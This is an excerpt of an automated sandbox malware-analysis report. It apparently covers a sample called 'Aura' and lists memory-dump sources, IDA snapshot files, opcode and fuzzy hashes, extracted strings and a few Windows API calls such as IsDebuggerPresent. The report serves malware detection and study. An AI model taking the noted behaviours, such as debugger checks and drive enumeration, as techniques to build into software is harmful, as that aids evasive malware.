                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseFileHandle_strlen$ReadSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1490117831-0
                                                                                                                                                                                                                                                    • Opcode ID: d0cea5f1561d445e8008f6cbaec540af8ddf8a3b29587dd297239cc55a9886fc
                                                                                                                                                                                                                                                    • Instruction ID: 741cd4ce61ef1e50424acaa822b5e3660d532e06d3bdefa6b709c5b59763b149
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0cea5f1561d445e8008f6cbaec540af8ddf8a3b29587dd297239cc55a9886fc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9571B2B2D002149BDB10DFA8DC44BEEBBB5FF5A310F140629E815A7392E7359945CBA1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 0pB$:8!v$?ohm$r?$}
                                                                                                                                                                                                                                                    • API String ID: 0-2715177541
                                                                                                                                                                                                                                                    • Opcode ID: 749cc9b2b166e2aefd78e54216929a7a1d54e2de09e8ea6fbb84eebd505d5f3a
                                                                                                                                                                                                                                                    • Instruction ID: 27fefe2fbb4672028c34b568132a3d04d557551c2bb752c391d38c84f1a92060
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 749cc9b2b166e2aefd78e54216929a7a1d54e2de09e8ea6fbb84eebd505d5f3a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 621266B2A183918BD714CF29D85126BB7E1EFD6304F09896EE8D5C7382D739D805CB86
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: %xy~$.L!r$E]$E]$tz
                                                                                                                                                                                                                                                    • API String ID: 0-4134713695
                                                                                                                                                                                                                                                    • Opcode ID: 8be511cfeaf7478c689c94cf0d6a1a9b7ea702216c27cb980bac304771c85408
                                                                                                                                                                                                                                                    • Instruction ID: 893324274ff4417acd688581e0214f6c4df399dd6a88d7d17f1ef9b959fda1b6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8be511cfeaf7478c689c94cf0d6a1a9b7ea702216c27cb980bac304771c85408
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2D1DFB0940B019FC320DF39C992663BFB1FF16300B54866DD4D68B755E338A459CBA6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ,-$4D582023FB8F39D4C0B9CBDD268CC7CD$_[G]$_[G]$y{
                                                                                                                                                                                                                                                    • API String ID: 0-2018755797
                                                                                                                                                                                                                                                    • Opcode ID: 9edd87a1e525675c0c32356b88bb5c69c29a2f3fa61c5e596b79bb2793044053
                                                                                                                                                                                                                                                    • Instruction ID: 6c32fc5b9f6112090130227e0787eee7bd849e3471c3c2ea16adaf94930d4e34
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9edd87a1e525675c0c32356b88bb5c69c29a2f3fa61c5e596b79bb2793044053
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4DC1177261C3808BD718DF26D89166BBBE6EBD1314F18883DE0D19B382DA3CD509CB16
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                                    • Instruction ID: 03eddda0b4bb5e0c87c425c40f5d660c5c5031d488aa6ab431d8ae86b7d2b0ce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C023971E012199BDF14CFA9C880AEEBBF5FF49314F248269E519E7341D731AA45CB90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 000AF8F5
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 000AF9C1
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000AF9DA
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 000AF9E4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                                                    • Opcode ID: c2622ce1d0a21ab61ee2d4bde1f5df48fc08367573dd93352a05aeb4800c9336
                                                                                                                                                                                                                                                    • Instruction ID: 966f81ca87a5cc2307b2e5b4eef77f5aaacc747b7d7fe136791d1e5486848775
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2622ce1d0a21ab61ee2d4bde1f5df48fc08367573dd93352a05aeb4800c9336
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E31F775D02219DBDF21DFA4D9497CDBBB8AF08300F1041EAE40CAB250EB759A848F85
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &'$5F&D$A~$Q3O-
                                                                                                                                                                                                                                                    • API String ID: 0-675504753
                                                                                                                                                                                                                                                    • Opcode ID: 812f62e87a523b56efcce59179e77158da321b0c9cf250dad7521a95bb97face
                                                                                                                                                                                                                                                    • Instruction ID: 633e36ed10f3989885d87796e4429ae6f20bcc81ed0b5666aa2646e33d91a16f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 812f62e87a523b56efcce59179e77158da321b0c9cf250dad7521a95bb97face
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 702211B2A4C3108FD714DF69CC916AFB7E2EFD5314F09892DE4C59B341E63889458B8A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DrivesLogical
                                                                                                                                                                                                                                                    • String ID: 74$t@
                                                                                                                                                                                                                                                    • API String ID: 999431828-3855452393
                                                                                                                                                                                                                                                    • Opcode ID: 7866ef0d8c57a24f9662bf5d6188eda46f7ca8aa7e94e414209a865f02cab398
                                                                                                                                                                                                                                                    • Instruction ID: d8fda7944a744acaf0d178b2b36fa13dc41ebd5ea8d3209462f2d5dd7201e77a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7866ef0d8c57a24f9662bf5d6188eda46f7ca8aa7e94e414209a865f02cab398
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12B197B5608380CFD310CF58D98122BBBE1EBC6704F55892DEAC59B321D7799946CB8B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: RDB$@AF
                                                                                                                                                                                                                                                    • API String ID: 0-293929955
                                                                                                                                                                                                                                                    • Opcode ID: f15f5163eaab6831977543f007d43be88b34e39f7c2b7db232dd98a3b66f87d2
                                                                                                                                                                                                                                                    • Instruction ID: 8e72b51382bd84331a0b3652428f3f841449d97c4acde29aa1b9e14835349b3b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f15f5163eaab6831977543f007d43be88b34e39f7c2b7db232dd98a3b66f87d2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 876111B16083409FE724CF29EC41BDBB7E4EB86308F01883DF6899B281D77595058B9B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: BPA$D]+\$kjih
                                                                                                                                                                                                                                                    • API String ID: 0-779469481
                                                                                                                                                                                                                                                    • Opcode ID: 3b795639909c093783c68fb88a88c2082f21191ea6d78dddba18fb4a727ae03a
                                                                                                                                                                                                                                                    • Instruction ID: c86518ecb6a2af19fc35f5361c14f0002270ccc2ac66e0080cc6d1c57852e329
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b795639909c093783c68fb88a88c2082f21191ea6d78dddba18fb4a727ae03a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77224479608301DFEB14DF24E84176BB7E2EBCA314F54843EE485573A2DB349D008B9A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: (l"R$SP$kjih
                                                                                                                                                                                                                                                    • API String ID: 0-567659598
                                                                                                                                                                                                                                                    • Opcode ID: 3785ca1b37f9add546c1038ec4aba19b713aab3aa18d44877dd8aa41cb3b2193
                                                                                                                                                                                                                                                    • Instruction ID: a3900cc6fc55148a6c8e14d85553ca1c9869342b247b30b550114912dbf9fceb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3785ca1b37f9add546c1038ec4aba19b713aab3aa18d44877dd8aa41cb3b2193
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ABB14972604310ABD714AF24E99277BB3E1EF91324F59852EF88597381E37CD905C36A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: kjih$kjih$kjih
                                                                                                                                                                                                                                                    • API String ID: 2994545307-810310282
                                                                                                                                                                                                                                                    • Opcode ID: 712fac94ba7437c9b3dbec18473d263afff0cd89d38fa19ec11d9b71cf0c5c0e
                                                                                                                                                                                                                                                    • Instruction ID: 767e002e25c183fdeed3407a3d66f84cc4350f69500a9d1ea3b218917b86b708
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 712fac94ba7437c9b3dbec18473d263afff0cd89d38fa19ec11d9b71cf0c5c0e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1B16B71A083014FD7249F24988163FF7B6EBDA324F15A52EF58567391DB39EC028B89
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: .$\$^_
                                                                                                                                                                                                                                                    • API String ID: 0-3646303928
                                                                                                                                                                                                                                                    • Opcode ID: 297d3f3141377644b6f0c33220492bdc5aba9e444d2ed4812824903fec6dcd11
                                                                                                                                                                                                                                                    • Instruction ID: 062b75e545c243369e7d1007839102a71fa034d595c1669f30e3ba6f234e4085
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 297d3f3141377644b6f0c33220492bdc5aba9e444d2ed4812824903fec6dcd11
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37D1E43A628252CBCB18AF28DC6127E73F1FF4A751F1A887DD4814B6A0EB798D50C715
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: kjih$kjih
                                                                                                                                                                                                                                                    • API String ID: 0-3924671761
                                                                                                                                                                                                                                                    • Opcode ID: 9c4abc055bfff55d6b9c6c044379669858391a61c272c9d70dbe5eab9bb1bf85
                                                                                                                                                                                                                                                    • Instruction ID: 435e266f2ad6e6eef63f3cb7faf8b725e12e8754059b896fb3d6e380001f75d0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c4abc055bfff55d6b9c6c044379669858391a61c272c9d70dbe5eab9bb1bf85
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C11D676346B60CBC3148B54E49027FB7D1EBD6721FA9952EC9D123B50C17C9C428B9A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                                                                    • API String ID: 0-123907689
                                                                                                                                                                                                                                                    • Opcode ID: e628c99f02590b6f0d4c943b71b77343dd47da835aa70e3396d5bfee97e0f26e
                                                                                                                                                                                                                                                    • Instruction ID: 7155dd8fcac62196877c4163cf259fe4e5bc86aa3de5309139ff4223dd971825
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e628c99f02590b6f0d4c943b71b77343dd47da835aa70e3396d5bfee97e0f26e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEC146B1B083245FC7149E25A88076BBBE6AB80314F49892FEC958B381D73CDD19C787
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: PLR3
                                                                                                                                                                                                                                                    • API String ID: 0-2761226970
                                                                                                                                                                                                                                                    • Opcode ID: 55f0f2b169892d99dcd16b4c9832ed68bdf8ab973c645c435139344f562a5964
                                                                                                                                                                                                                                                    • Instruction ID: 032294ec5626711b583989303ca1e9da9d1a30cf5e4cc2b543d20f08b9a82161
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55f0f2b169892d99dcd16b4c9832ed68bdf8ab973c645c435139344f562a5964
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7811675601B008FC725CF28C8917A3B7F1FF96314B0895ADD4968B7A2D738E885CB94
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: kjih
                                                                                                                                                                                                                                                    • API String ID: 2994545307-2138429548
                                                                                                                                                                                                                                                    • Opcode ID: a33593026fd8eb9ec5c79d2faeb1b809e771c45f5c9a28dba86a33fca7da4d5a
                                                                                                                                                                                                                                                    • Instruction ID: 4357d8f11cacceb57ec802c14660e1cd95a9d51a826ff5a575db21d457add18a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a33593026fd8eb9ec5c79d2faeb1b809e771c45f5c9a28dba86a33fca7da4d5a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C613B326057118BCB609F28C8C076BF792EFCA324F19A52ED68497365D735AC45C7C5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: kjih
                                                                                                                                                                                                                                                    • API String ID: 0-2138429548
                                                                                                                                                                                                                                                    • Opcode ID: a1d68a4cb3e2e4bf4865ca5e0cd9f0b9f8ab046a7825ff6a50d9a1042725e3fa
                                                                                                                                                                                                                                                    • Instruction ID: 91fe87c1877ca5f05fcaee7cce7fcb8ec47d91bc591b00911bc4e7c23d8210a4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1d68a4cb3e2e4bf4865ca5e0cd9f0b9f8ab046a7825ff6a50d9a1042725e3fa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 635107B46083019FE7009F29DC81B2FB7E5EB89314F10982DF68597292DB39EC15C79A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ! %
                                                                                                                                                                                                                                                    • API String ID: 0-2174870612
                                                                                                                                                                                                                                                    • Opcode ID: 2e64160a11173ddfd979c0ea3d0d2b814565963c2ce7f953d5e5f862b9a3bbaa
                                                                                                                                                                                                                                                    • Instruction ID: 8f1612b3a262938f3178b7bf199caa3967da8d02cacb31485a6ba24c03ffaef1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e64160a11173ddfd979c0ea3d0d2b814565963c2ce7f953d5e5f862b9a3bbaa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB515731649B658BD720CF6494912BBBBE1DF65310F948A2FC4D687381E238A805D35A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: eB
                                                                                                                                                                                                                                                    • API String ID: 0-3246501281
                                                                                                                                                                                                                                                    • Opcode ID: e457f3081f52afee7ef6ccade78faed1e2b4b572523890a29aca42b2418bd9a1
                                                                                                                                                                                                                                                    • Instruction ID: c9e8a37eecd0f3d021b10de5c2d54c9a99e51523f08571bc8dc744a8d9646f72
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e457f3081f52afee7ef6ccade78faed1e2b4b572523890a29aca42b2418bd9a1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0631C03060C3D18BD7398F3484657EBBBA1AF96304F94499DC0CA9B282DB39550ACB56
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: s
                                                                                                                                                                                                                                                    • API String ID: 0-453955339
                                                                                                                                                                                                                                                    • Opcode ID: e45a1f2e2537c3aa27091e076b28e989616aa4a1697a312ccc4ccaba39526ba3
                                                                                                                                                                                                                                                    • Instruction ID: 29f20c3b0e98ad2f0a32b60c155a5575d60e561524289968dcee3ba061b6bae2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e45a1f2e2537c3aa27091e076b28e989616aa4a1697a312ccc4ccaba39526ba3
